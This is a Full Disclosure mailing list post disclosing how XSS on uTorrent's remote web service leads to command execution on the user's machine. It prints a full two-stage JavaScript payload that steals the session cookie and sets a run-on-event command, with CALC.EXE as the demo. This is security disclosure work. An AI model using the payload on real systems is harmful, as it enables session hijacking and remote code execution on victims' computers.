Full Disclosure mailing list archives
Re: Transmission BitTorrent XSS Vulnerability
From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sat, 28 Jul 2012 19:36:39 +0200
Tavis Ormandy <taviso () cmpxchg8b com> wrote:
Justin Klein Keane <justin () madirish net> wrote:Impact - ------ Clients loading a maliciously crafted .torrent file into Transmission and viewing the web client could be subject to arbitrary script injection, allowing an attacker to run arbitrary code in the context of the victim's web browser. This could lead to privacy compromises (such as if the script "phoned home" to another URL with client information) or client side attacks (such as drive by downloads).I was just looking at a similar package for Windows called utorrent. They relay the remote administration through a third party, presumably to help non-technical users understand NAT traversal. Similar problems exist, but you can use it to set configuration options that result in command execution. I guess this problem is public as their contact address is a public bug tracking system (mea culpa). I have a working demo for command execution, email me off-list if you want it (I'm reluctant to send too much information about windows software to the list, as journalists tend to abuse it, email me if you need specifics). Tavis.
Too many requests, I've included details below. Don't get too excited, it's not very interesting. I suppose it's worth documenting as another example of XSS to native code execution, although it's more academic than a realistic threat as nobody is likely to use this with an expectation of security. The problem is that any XSS on remote.utorrent.com (or presumably if you're a mitm with sslstrip) is equivalent to code execution if the "remote" option has been enabled in the preferences dialog (Assuming the user is logged in, of course). As with any non-trivial web application, these are not difficult to find, even for non-web specialists like me. Once you have an XSS, explotation is relatively straightforward. - Read the bt_talon_tkt cookie from remote.utorrent.com - Resolve the ticket to a raptor using XHR to 'https://remote.utorrent.com/talon/getinfo?bt_talon_tkt=' + encodeURIComponent(ticket); - Exploit the same XSS on the raptor, allowing you interact with the application. The most obvious attack is to set the "state_cmd" option to whatever command you require (I assume \\remotehost\whatever.exe will work via the webdav redirector, but I didn't test it). Here is the demo I sent to the vendor, I don't know if it works for all cases https://remote.utorrent.com/send?btih=DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF&dn=ignored&message=';eval(unescape(document.location.hash.substring(1)));//#var%20ticket%3Bdocument.cookie.split%28%27%3B%27%29.forEach%28function%28cookie%29% 7Bticket%3Dcookie.indexOf%28%27bt_talon_tkt%27%29%21%3D-1%3FencodeURIComponent%28cookie.split%28unescape%28%27%2522%27%29%29%5B1%5D%29%3Aticket%7D%29%3Bx%3Dnew%20XMLHttpRequest%28%29%3Bx.open%28%27GET%27%2C%27/talon/getinfo%3Fbt_talon_tkt %3D%27+ticket%2Cfalse%29%3Bx.send%28%29%3Braptor%3Deval%28%27%28%27%20+%20x.responseText%20+%20%27%29%27%29.raptor%3Bdocument.location%3Draptor.replace%28%27http%3A%27%2C%27https%3A%27%29.replace%28%279090%27%2C%279000%27%29+unescape%28%2 7/send%253Fbtih%253DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%2526dn%253Dignored%2526message%253D%2527%253Beval%2528unescape%2528document.location.hash.substring%25281%2529%2529%2529%253B//%2523f%25253Ddocument.createElement%252528%252527I FRAME%252527%252529%25253Bf.src%25253D%252527/talon/gui%25253Futorrent%25253D1%252527%25253Bdocument.body.appendChild%252528f%252529%25253BsetTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.uki%252 528%252527%252523toolbar_preferences%252527%252529.trigger%252528%252527mousedown%252527%25252C%252520%25257Bwhich%252520%25253A%2525201%25257D%252529%252520%25257D%25252C%2525205000%252529%25253B%252520setTimeout%252528function%252520%25 2528%252529%252520%25257B%252520f.contentDocument.window.utWebUI.stpanes.show%252528%252527dlgSettings-RunProgram%252527%252529%252520%25257D%25252C%2525206000%252529%25253B%252520setTimeout%252528function%252520%252528%252529%252520%2525 7B%252520f.contentDocument.window.document.getElementById%252528%252527state_cmd%252527%252529.value%25253D%252527C%25253A%25255C%25255CWINDOWS%25255C%25255CSYSTEM32%25255C%25255CCALC.EXE%252527%252520%25257D%25252C%2525207000%252529%2525 3B%252520setTimeout%252528function%252520%252528%252529%252520%25257B%252520f.contentDocument.window.document.getElementById%252528%252527DLG_SETTINGS_SAVE%252527%252529.click%252528%252529%25253B%252520%25257D%25252C%2525208000%252529%25 253B%27%29%3B Wait a few seconds, then check the preferences pane of the client to see if the new setting has set. The escaped text is the following inelegant code: Stage 1 payload: var ticket; document.cookie.split(';').forEach(function (cookie) { ticket = cookie.indexOf('bt_talon_tkt') != -1 ? encodeURIComponent(cookie.split(unescape('%22'))[1]) : ticket }); x = new XMLHttpRequest(); x.open('GET', '/talon/getinfo?bt_talon_tkt=' + ticket, false); x.send(); raptor = eval('(' + x.responseText + ')').raptor; document.location = raptor.replace('http:','https:') .replace('9090','9000') + unescape('/send%3Fbtih%3DDEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF%26dn%3Dignored%26message%3D%27%3Beval%28unescape%28document.location.hash.substring%281%29%29%29%3B//%23f%253Ddocument.createElement%2528%25 27IFRAME%2527%2529%253Bf.src%253D%2527/talon/gui%253Futorrent%253D1%2527%253Bdocument.body.appendChild%2528f%2529%253BsetTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.uki%2528%2527%2523toolbar_preferences%2527 %2529.trigger%2528%2527mousedown%2527%252C%2520%257Bwhich%2520%253A%25201%257D%2529%2520%257D%252C%25205000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.utWebUI.stpanes.show%2528%2527dlgSetti ngs-RunProgram%2527%2529%2520%257D%252C%25206000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527state_cmd%2527%2529.value%253D%2527C%253A%255C%255CWINDOWS%255C% 255CSYSTEM32%255C%255CCALC.EXE%2527%2520%257D%252C%25207000%2529%253B%2520setTimeout%2528function%2520%2528%2529%2520%257B%2520f.contentDocument.window.document.getElementById%2528%2527DLG_SETTINGS_SAVE%2527%2529.click%2528%2529%253B%2520 %257D%252C%25208000%2529%253B'); Stage 2 payload: f = document.createElement('IFRAME'); f.src = '/talon/gui?utorrent=1'; document.body.appendChild(f); setTimeout(function () { f.contentDocument.window.uki('#toolbar_preferences').trigger('mousedown', {which : 1}) }, 5000); setTimeout(function () { f.contentDocument.window.utWebUI.stpanes.show('dlgSettings-RunProgram') }, 6000); setTimeout(function () { f.contentDocument.window.document.getElementById('state_cmd').value='C:\\WINDOWS\\SYSTEM32\\CALC.EXE' }, 7000); setTimeout(function () { f.contentDocument.window.document.getElementById('DLG_SETTINGS_SAVE').click(); }, 8000); I'm sure javascript programmers will cringe at my code, my apologies. Tavis. -- ------------------------------------- taviso () cmpxchg8b com | pgp encrypted mail preferred ------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Transmission BitTorrent XSS Vulnerability Justin Klein Keane (Jul 26)
- Re: Transmission BitTorrent XSS Vulnerability Tavis Ormandy (Jul 28)
- Re: Transmission BitTorrent XSS Vulnerability Tavis Ormandy (Jul 28)
- Re: Transmission BitTorrent XSS Vulnerability Tavis Ormandy (Jul 28)